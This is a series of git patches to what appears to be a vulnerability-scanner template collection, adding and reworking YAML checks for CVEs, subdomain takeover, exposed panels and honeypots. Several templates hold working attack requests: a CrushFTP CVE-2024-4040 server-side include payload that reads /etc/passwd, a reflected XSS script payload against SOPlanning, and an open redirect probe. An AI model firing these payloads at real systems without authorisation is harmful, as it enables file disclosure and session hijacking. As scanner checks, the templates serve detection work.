4a0a00473045022100a1bf43094a8a2ebf252d9ff331d334da4732cc4973121200c8d1a1faad8c0d0002201952b9324faa832fbed0e7662d820c1e56ea3f0820a3a67bc11da01926bba9b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 032c29c3fe3de5d747beff802658556602fcc5fd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 3 May 2024 16:40:01 +0530 Subject: [PATCH 0551/1768] added metadata --- http/cves/2024/CVE-2024-0881.yaml | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-0881.yaml b/http/cves/2024/CVE-2024-0881.yaml index f98e32e521..a2168da2cf 100644 --- a/http/cves/2024/CVE-2024-0881.yaml +++ b/http/cves/2024/CVE-2024-0881.yaml @@ -9,10 +9,14 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-0881 - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/ + - https://github.com/fkie-cad/nvd-json-data-feeds classification: epss-score: 0.00043 - epss-percentile: 0.08273 - tags: wpscan,wordpress,wp-plugin,unauth,cve2023 + epss-percentile: 0.08256 + metadata: + max-request: 1 + publicwww-query: "/wp-content/plugins/post-grid/" + tags: cve,cve2023,wpscan,wordpress,wp-plugin,unauth http: - method: GET @@ -22,11 +26,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - '"html"' - '"<div class=' - condition: and \ No newline at end of file + condition: and + + - type: status + status: + - 200 From 1529f2339d37941af89aad79b5eeff9f2c9bafe9 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Fri, 3 May 2024 09:36:42 -0500 Subject: [PATCH 0552/1768] Create squadcast-takeover.yaml I tested the takeover creating an account, added a subdomain to point to the service and then linked another account with the subdomain. --- http/takeovers/squadcast-takeover.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 http/takeovers/squadcast-takeover.yaml diff --git a/http/takeovers/squadcast-takeover.yaml b/http/takeovers/squadcast-takeover.yaml new file mode 100644 index 0000000000..b64366cca4 --- /dev/null +++ b/http/takeovers/squadcast-takeover.yaml @@ -0,0 +1,26 @@ +id: squadcast-takeover + +info: + name: squadcast takeover detection + author: philippedelteil + severity: medium + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/398 + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - 'There doesn’t seem to be an active status page associated with this URL.' + - 'Please check the URL and try again.' + condition: and + - type: status + status: + - 404 + From 9fd2e20d99facf2f9d031e085ba4b2f325a6c674 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Fri, 3 May 2024 17:57:13 +0300 Subject: [PATCH 0553/1768] add cve-2023-6389 --- http/cves/2023/ CVE-2023-6389.yaml | 36 ++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/cves/2023/ CVE-2023-6389.yaml diff --git a/http/cves/2023/ CVE-2023-6389.yaml b/http/cves/2023/ CVE-2023-6389.yaml new file mode 100644 index 0000000000..709d668e38 --- /dev/null +++ b/http/cves/2023/ CVE-2023-6389.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-6389 + +info: + name: WordPress Toolbar <= 2.2.6 - Open Redirect + author: Kazgangap + severity: medium + description: | + The plugin redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-6389 + - https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-6389 + cwe-id: CWE-601 + epss-score: 0.00097 + epss-percentile: 0.40297 + cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:*:wordpress:* + metadata: + vendor: abhinavsingh + product: wordpress_toolbar + tags: wpscan,redirect,wordpress,cve2023,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme" + + redirects: true + max-redirects: 2 + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' \ No newline at end of file From 51f6fdfb3c9861f82f7e042bc3fd48ce41375af3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Fri, 3 May 2024 10:22:21 -0500 Subject: [PATCH 0554/1768] Update squadcast-takeover.yaml removing blank lines --- http/takeovers/squadcast-takeover.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/takeovers/squadcast-takeover.yaml b/http/takeovers/squadcast-takeover.yaml index b64366cca4..8096d81b8d 100644 --- a/http/takeovers/squadcast-takeover.yaml +++ b/http/takeovers/squadcast-takeover.yaml @@ -6,7 +6,7 @@ info: severity: medium tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/398 - + requests: - method: GET path: @@ -23,4 +23,3 @@ requests: - type: status status: - 404 - From 1da993b4b087f9df8ceae3284a7bf16c18f8e517 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Fri, 3 May 2024 18:28:50 +0300 Subject: [PATCH 0555/1768] add so plannig xss --- .../vulnerabilities/other/soplanning-xss.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/vulnerabilities/other/soplanning-xss.yaml diff --git a/http/vulnerabilities/other/soplanning-xss.yaml b/http/vulnerabilities/other/soplanning-xss.yaml new file mode 100644 index 0000000000..7363c48393 --- /dev/null +++ b/http/vulnerabilities/other/soplanning-xss.yaml @@ -0,0 +1,30 @@ +id: soplanning-xss +info: + name: SOPlanning 1.52.00 Cross Site Scripting + author: Kazgangap + severity: high + description: | + SOPlanning v1.52.00 is vulnerable to reflected cross-site scripting (XSS) via the 'groupe_id' parameter. + A remote unauthenticated attacker can inject JavaScript code leading to session hijacking or account takeover. + reference: + - https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html + metadata: + vendor: soplanning + product: soplanning + tags: packetstorm,xss,soplanning + +http: + - method: GET + path: + - "{{BaseURL}}/www/process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New" + + matchers-condition: and + matchers: + - type: word + words: + - "<script>alert(document.domain)</script>" + part: body + + - type: status + status: + - 200 \ No newline at end of file From 7cd79aba208b25c08008e10b3f5b70c17de4b466 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Fri, 3 May 2024 23:58:20 -0500 Subject: [PATCH 0556/1768] Update squadcast-takeover.yaml trailing spaces removed --- http/takeovers/squadcast-takeover.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/takeovers/squadcast-takeover.yaml b/http/takeovers/squadcast-takeover.yaml index 8096d81b8d..aace9d3802 100644 --- a/http/takeovers/squadcast-takeover.yaml +++ b/http/takeovers/squadcast-takeover.yaml @@ -6,7 +6,6 @@ info: severity: medium tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/398 - requests: - method: GET path: From 6b92f9d9f0b7a526552aa6845f83d8c4f0851cdc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sat, 4 May 2024 12:15:08 +0530 Subject: [PATCH 0557/1768] minor update --- http/cves/2023/ CVE-2023-6389.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/ CVE-2023-6389.yaml b/http/cves/2023/ CVE-2023-6389.yaml index 709d668e38..51d52aebbd 100644 --- a/http/cves/2023/ CVE-2023-6389.yaml +++ b/http/cves/2023/ CVE-2023-6389.yaml @@ -20,17 +20,16 @@ info: metadata: vendor: abhinavsingh product: wordpress_toolbar - tags: wpscan,redirect,wordpress,cve2023,wp-plugin + max-request: 1 + tags: cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme" - redirects: true - max-redirects: 2 matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' From 46ddad5906385f2eff893a2dc9739a67360a312d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sat, 4 May 2024 12:19:41 +0530 Subject: [PATCH 0558/1768] format update --- http/takeovers/squadcast-takeover.yaml | 21 ++++++++++++++++----- 1 file changed, 16 insertions(+), 5 deletions(-) diff --git a/http/takeovers/squadcast-takeover.yaml b/http/takeovers/squadcast-takeover.yaml index aace9d3802..7510d84bcf 100644 --- a/http/takeovers/squadcast-takeover.yaml +++ b/http/takeovers/squadcast-takeover.yaml @@ -1,24 +1,35 @@ id: squadcast-takeover info: - name: squadcast takeover detection + name: Squadcast Takeover Detection author: philippedelteil - severity: medium - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/398 -requests: + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/398 + metadata: + max-request: 1 + tags: takeover,squadcast + +http: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 2 + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'There doesn’t seem to be an active status page associated with this URL.' - 'Please check the URL and try again.' condition: and + - type: status status: - 404 From 81843b881c7986bdef38b78903a6c2d219d32dcf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sat, 4 May 2024 12:30:18 +0530 Subject: [PATCH 0559/1768] minor update --- http/vulnerabilities/other/soplanning-xss.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/soplanning-xss.yaml b/http/vulnerabilities/other/soplanning-xss.yaml index 7363c48393..bc79e4dbce 100644 --- a/http/vulnerabilities/other/soplanning-xss.yaml +++ b/http/vulnerabilities/other/soplanning-xss.yaml @@ -1,16 +1,17 @@ id: soplanning-xss + info: name: SOPlanning 1.52.00 Cross Site Scripting author: Kazgangap severity: high description: | - SOPlanning v1.52.00 is vulnerable to reflected cross-site scripting (XSS) via the 'groupe_id' parameter. - A remote unauthenticated attacker can inject JavaScript code leading to session hijacking or account takeover. + SOPlanning v1.52.00 is vulnerable to reflected cross-site scripting (XSS) via the 'groupe_id' parameter.A remote unauthenticated attacker can inject JavaScript code leading to session hijacking or account takeover. reference: - https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html metadata: vendor: soplanning product: soplanning + shodan-query: html:"soplanning" tags: packetstorm,xss,soplanning http: @@ -27,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From eef23f7af896fc050fbabd7be706fa9283de6ae9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sat, 4 May 2024 12:41:09 +0530 Subject: [PATCH 0560/1768] Update cerberus-malware.yaml --- file/malware/cerberus-malware.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/file/malware/cerberus-malware.yaml b/file/malware/cerberus-malware.yaml index 0b15fdd4d3..f105418ff5 100644 --- a/file/malware/cerberus-malware.yaml +++ b/file/malware/cerberus-malware.yaml @@ -4,13 +4,15 @@ info: name: Cerberus Malware - Detect author: daffainfo severity: info - reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar tags: malware,file + file: - extensions: - all - matchers-condition: or + matchers-condition: and matchers: - type: word part: raw From 72dfb81bb8152ae9031758f9ee755c6aa0a2539d Mon Sep 17 00:00:00 2001 From: Panagiotis Chartas <t3l3machus@protonmail.com> Date: Sat, 4 May 2024 10:32:49 +0200 Subject: [PATCH 0561/1768] Create avada-fusion-forms-uploads-exposure.yaml --- .../avada-fusion-forms-uploads-exposure.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/vulnerabilities/wordpress/avada-fusion-forms-uploads-exposure.yaml diff --git a/http/vulnerabilities/wordpress/avada-fusion-forms-uploads-exposure.yaml b/http/vulnerabilities/wordpress/avada-fusion-forms-uploads-exposure.yaml new file mode 100644 index 0000000000..a3c6c25886 --- /dev/null +++ b/http/vulnerabilities/wordpress/avada-fusion-forms-uploads-exposure.yaml @@ -0,0 +1,36 @@ +id: avada-fusion-forms-uploads-exposure + +info: + name: Avada < 7.11.7 - Unauthenticated Sensitive Information Exposure via Form Uploads Directory Listing + author: t3l3machus + severity: medium + description: The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism. + reference: + - https://vulners.com/wpvulndb/WPVDB-ID:507E1D07-4953-4A31-81E8-80F01F971E2A + - https://nvd.nist.gov/vuln/detail/CVE-2024-2340 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + metadata: + verified: true + max-request: 1 + tags: wp-plugin,wp,wordpress,unauthenticated,wpscan + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/fusion-forms/" + + matchers-condition: and + matchers: + - type: regex + part: body + # words: + # - "<title>Index of /wp-content/uploads/fusion-forms" + regex: + - 'Index of [\s\S]*title>' + condition: and + + - type: status + status: + - 200 From d2a197239992bf148aa3bffab5f47ccc9876cd51 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 5 May 2024 03:16:54 +0530 Subject: [PATCH 0562/1768] Update and rename avada-fusion-forms-uploads-exposure.yaml to CVE-2024-2340.yaml --- .../2024/CVE-2024-2340.yaml} | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) rename http/{vulnerabilities/wordpress/avada-fusion-forms-uploads-exposure.yaml => cves/2024/CVE-2024-2340.yaml} (51%) diff --git a/http/vulnerabilities/wordpress/avada-fusion-forms-uploads-exposure.yaml b/http/cves/2024/CVE-2024-2340.yaml similarity index 51% rename from http/vulnerabilities/wordpress/avada-fusion-forms-uploads-exposure.yaml rename to http/cves/2024/CVE-2024-2340.yaml index a3c6c25886..74615dd55c 100644 --- a/http/vulnerabilities/wordpress/avada-fusion-forms-uploads-exposure.yaml +++ b/http/cves/2024/CVE-2024-2340.yaml @@ -1,20 +1,27 @@ -id: avada-fusion-forms-uploads-exposure +id: CVE-2024-2340 info: name: Avada < 7.11.7 - Unauthenticated Sensitive Information Exposure via Form Uploads Directory Listing author: t3l3machus severity: medium - description: The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism. + description: | + The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism. + remediation: Fixed in 7.11.7 reference: - https://vulners.com/wpvulndb/WPVDB-ID:507E1D07-4953-4A31-81E8-80F01F971E2A - https://nvd.nist.gov/vuln/detail/CVE-2024-2340 + - https://avada.com/documentation/avada-changelog/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8db8bbc3-43ca-4ef5-a44d-2987c8597961?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 + cve-id: CVE-2024-2340 + epss-score: 0.00043 + epss-percentile: 0.08267 metadata: verified: true max-request: 1 - tags: wp-plugin,wp,wordpress,unauthenticated,wpscan + tags: cve,cve2024,wp-plugin,wp,wordpress,unauthenticated,wpscan http: - method: GET @@ -25,8 +32,6 @@ http: matchers: - type: regex part: body - # words: - # - "<title>Index of /wp-content/uploads/fusion-forms" regex: - 'Index of [\s\S]*title>' condition: and From d2b760ec6fe48ff934d496bea01204cda7a6aefd Mon Sep 17 00:00:00 2001 From: johnk3r <johnatan2camargo@gmail.com> Date: Sat, 4 May 2024 20:07:21 -0300 Subject: [PATCH 0563/1768] Update boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml index 7510f68dc1..2c84f8fb10 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/exposed-panels/boa-webserver.yaml @@ -4,9 +4,10 @@ info: name: Boa Web Server- Detect author: johnk3r severity: info - description: Boa Web Server panel was detected. + description: Boa is a single-tasking HTTP server. That means that unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections. reference: - https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/ + - http://www.boa.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 From 654317648bc7dbcdfaa8a2367577d6538e480ec2 Mon Sep 17 00:00:00 2001 From: johnk3r <johnatan2camargo@gmail.com> Date: Sat, 4 May 2024 20:07:45 -0300 Subject: [PATCH 0564/1768] Update boa-webserver.yaml --- http/exposed-panels/boa-webserver.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/exposed-panels/boa-webserver.yaml index 2c84f8fb10..814f0a8c45 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/exposed-panels/boa-webserver.yaml @@ -11,7 +11,7 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 - tags: boa,panel + tags: boa,tech http: - method: GET From 454bf079af4e0e6787b11a6bd15f6e8e8e7c4e62 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 5 May 2024 15:30:19 +0530 Subject: [PATCH 0565/1768] Update CVE-2024-4040.yaml --- http/cves/2024/CVE-2024-4040.yaml | 80 +++++++++++++++++++++++++++---- 1 file changed, 72 insertions(+), 8 deletions(-) diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index 87bec97120..5eb41b61d8 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -23,26 +23,35 @@ info: max-request: 2 tags: cve,cve2024,lfi,crushftp,vfs +flow: | + log(template) + if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) { + // if username or password is not provided, run unauthenticated exploit + http("unauth-exploit") + } else { + // if username and password is provided, run login script and authenticated exploit + http("login") && http("auth-exploit") + } + + http: - - raw: + # unauthenticated exploit + - id: unauth-exploit + raw: - | GET /WebInterface/ HTTP/1.1 Host: {{Hostname}} - | - POST /WebInterface/function/ HTTP/1.1 + POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - user_ip: 127.0.0.1 - - command=exists&random=0.34712915617878926&paths=%3CINCLUDE%3Eprefs.XML%3C%2FINCLUDE%3E&c2f={{auth}} matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - - "<server_prefs" + - "root:x" - type: word part: header @@ -57,3 +66,58 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' + + # login script + - id: login + raw: + - | + GET /WebInterface/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /WebInterface/function/ HTTP/1.1 + Host: {{Hostname}} + Content-Length: 111 + Origin: {{RootURL}} + Referer: http://{{RootURL}}/WebInterface/login.html + + command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926 + + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body_2 + internal: true + words: + - "<response>success</response>" + + - type: word + part: header_2 + internal: true + words: + - "text/xml" + + extractors: + - type: regex + name: auth + internal: true + part: header_2 + group: 1 + regex: + - 'currentAuth=([0-9a-zA-Z]+)' + + # authenticated exploit + - id: auth-exploit + raw: + - | + POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - "root:x" From 09c3fd243d13aa8f572a4ad43913d0671513c349 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 5 May 2024 15:35:56 +0530 Subject: [PATCH 0566/1768] Update CVE-2024-4040.yaml --- http/cves/2024/CVE-2024-4040.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index 5eb41b61d8..d09f273343 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -24,7 +24,6 @@ info: tags: cve,cve2024,lfi,crushftp,vfs flow: | - log(template) if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) { // if username or password is not provided, run unauthenticated exploit http("unauth-exploit") From 0221a0f006b0910c50dd8c5fe239813a86cc90ac Mon Sep 17 00:00:00 2001 From: Rishi <rishi@rxerium.com> Date: Sun, 5 May 2024 13:53:56 +0100 Subject: [PATCH 0567/1768] tpot honeypot detection --- http/honeypot/tpot-honeypot-detect.yaml | 27 +++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/honeypot/tpot-honeypot-detect.yaml diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml new file mode 100644 index 0000000000..d1a6eab7cf --- /dev/null +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -0,0 +1,27 @@ +id: tpot-honeypot-detect + +info: + name: tpot Honeypot - Detect + author: rxerium + severity: info + description: | + A tpot dashboard has been detected + tags: tpot,honeypot + +http: + - method: GET + path: + - "{{BaseURL}}:64297" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>T-Pot" + - "T-Pot @ Github" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 50885a606ce94dc8ecf73c6546f1aee47d20ae1f Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 5 May 2024 14:00:52 +0100 Subject: [PATCH 0568/1768] openweb-ui-panel --- http/exposed-panels/openweb-ui-detect.yaml | 27 ++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/openweb-ui-detect.yaml diff --git a/http/exposed-panels/openweb-ui-detect.yaml b/http/exposed-panels/openweb-ui-detect.yaml new file mode 100644 index 0000000000..fcf01f9393 --- /dev/null +++ b/http/exposed-panels/openweb-ui-detect.yaml @@ -0,0 +1,27 @@ +id: openwebui-panel + +info: + name: Openweb UI Panel - Detect + author: rxerium + severity: info + description: | + Self hostable panel for LLMs + reference: + - https://openwebui.com/ + tags: panel,openwebui,login + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + matchers-condition: and + matchers: + - type: word + words: + - 'Open WebUI' + + - type: status + status: + - 200 \ No newline at end of file From cc32b70d236a784ea2e9402a82ffbf70fb762f13 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 5 May 2024 14:02:12 +0100 Subject: [PATCH 0569/1768] add ref --- http/honeypot/tpot-honeypot-detect.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index d1a6eab7cf..7fad9f5525 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -6,6 +6,8 @@ info: severity: info description: | A tpot dashboard has been detected + reference: + - https://github.com/telekom-security/tpotce tags: tpot,honeypot http: From 29019b382ce593978bbc36541b746b37f1ff5d91 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 5 May 2024 14:06:13 +0100 Subject: [PATCH 0570/1768] cyber chef panel --- http/exposed-panels/cyberchef-detect.yaml | 27 +++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/cyberchef-detect.yaml diff --git a/http/exposed-panels/cyberchef-detect.yaml b/http/exposed-panels/cyberchef-detect.yaml new file mode 100644 index 0000000000..49a90e6e67 --- /dev/null +++ b/http/exposed-panels/cyberchef-detect.yaml @@ -0,0 +1,27 @@ +id: cyberchef-panel + +info: + name: Cyber Chef Panel Detect + author: rxerium + severity: info + description: A Cyber Chef Panel was detected + tags: panel,cyberchef,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'CyberChef' + + - type: status + status: + - 200 \ No newline at end of file From f6f488b38d2eb6796ec394a8e73d35fe640e7524 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 5 May 2024 14:07:09 +0100 Subject: [PATCH 0571/1768] strengthen matchers --- http/exposed-panels/cyberchef-detect.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/exposed-panels/cyberchef-detect.yaml b/http/exposed-panels/cyberchef-detect.yaml index 49a90e6e67..077787a72e 100644 --- a/http/exposed-panels/cyberchef-detect.yaml +++ b/http/exposed-panels/cyberchef-detect.yaml @@ -5,6 +5,8 @@ info: author: rxerium severity: info description: A Cyber Chef Panel was detected + reference: + - https://cyberchef.org tags: panel,cyberchef,detect http: @@ -21,6 +23,8 @@ http: part: body words: - 'CyberChef' + - 'The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis' + condition: and - type: status status: From 64c92049d900b8627af769e383aff44c3e77c037 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 5 May 2024 14:08:24 +0100 Subject: [PATCH 0572/1768] strengthen matchers --- http/honeypot/tpot-honeypot-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index 7fad9f5525..43470e4fa6 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -22,6 +22,7 @@ http: words: - "T-Pot" - "T-Pot @ Github" + - "T-Pot ReadMe" condition: and - type: status From 483a00e3f1097e6e8b3d4982e8e5e91fb62fbc7f Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 5 May 2024 14:09:01 +0100 Subject: [PATCH 0573/1768] update description --- http/exposed-panels/openweb-ui-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/openweb-ui-detect.yaml b/http/exposed-panels/openweb-ui-detect.yaml index fcf01f9393..31d68f23e5 100644 --- a/http/exposed-panels/openweb-ui-detect.yaml +++ b/http/exposed-panels/openweb-ui-detect.yaml @@ -5,7 +5,7 @@ info: author: rxerium severity: info description: | - Self hostable panel for LLMs + An OpenWebUI panel was detected reference: - https://openwebui.com/ tags: panel,openwebui,login From f3e88d5c93c6e0884b4d828f8ff49cd007a3dc82 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 6 May 2024 07:55:12 +0530 Subject: [PATCH 0574/1768] Update and rename openweb-ui-detect.yaml to openwebui-panel.yaml --- .../{openweb-ui-detect.yaml => openwebui-panel.yaml} | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) rename http/exposed-panels/{openweb-ui-detect.yaml => openwebui-panel.yaml} (73%) diff --git a/http/exposed-panels/openweb-ui-detect.yaml b/http/exposed-panels/openwebui-panel.yaml similarity index 73% rename from http/exposed-panels/openweb-ui-detect.yaml rename to http/exposed-panels/openwebui-panel.yaml index 31d68f23e5..24d715f163 100644 --- a/http/exposed-panels/openweb-ui-detect.yaml +++ b/http/exposed-panels/openwebui-panel.yaml @@ -8,6 +8,10 @@ info: An OpenWebUI panel was detected reference: - https://openwebui.com/ + metadata: + shodan-query: http.favicon.hash:-286484075 + verified: true + max-request: 1 tags: panel,openwebui,login http: @@ -16,6 +20,8 @@ http: - "{{BaseURL}}" host-redirects: true + max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -24,4 +30,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From 5c0a7eca506c406edae3f7fc821332be9e2cc2cb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 6 May 2024 08:01:37 +0530 Subject: [PATCH 0575/1768] Update and rename cyberchef-detect.yaml to cyberchef-panel.yaml --- .../{cyberchef-detect.yaml => cyberchef-panel.yaml} | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) rename http/exposed-panels/{cyberchef-detect.yaml => cyberchef-panel.yaml} 